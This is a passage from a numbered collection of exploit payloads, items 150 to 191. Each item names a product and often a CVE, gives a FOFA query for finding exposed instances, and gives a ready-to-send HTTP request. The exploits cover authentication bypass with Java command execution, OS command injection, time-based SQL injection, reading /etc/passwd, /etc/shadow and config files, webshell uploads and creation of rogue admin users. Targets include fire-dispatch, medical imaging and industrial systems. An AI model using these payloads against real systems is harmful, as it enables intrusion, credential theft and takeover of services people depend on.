{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the contents of /etc/passwd written to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM (Meite CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达医学影像存档与通信系统 (INFINITT PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 path traversal and arbitrary file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 (Keytop smart parking fee system) Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 (Hefeng multimedia information publishing system) QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 (Haoka Jituan distribution management system) ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 (Smart Campus / Anxiaoyi management system) FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 (Zhongcheng Kexin ticketing management platform) SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR (Hongjing EHR) OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR (Hongjing EHR) downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR (Hongjing EHR) DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 (Tongtianxing CMSV6 vehicle positioning and monitoring platform) SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD license plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA (Jinhe OA) C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA (Jinhe OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 (telecom gateway configuration management system) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 (Jianwen engineering project management system) arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM (Bangguanke CRM) jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 (Runshen enterprise standardization management system) UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 (Runshen enterprise standardization management system) AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 (Guangzhou Tuchuang Interlib library cluster management system) updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus 网关 (Xunrao X2Modbus gateway) AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 (Realor Tianyi application virtualization system) SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system used in photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 (Santi Jiahui video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (Lanwon clinical image viewing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
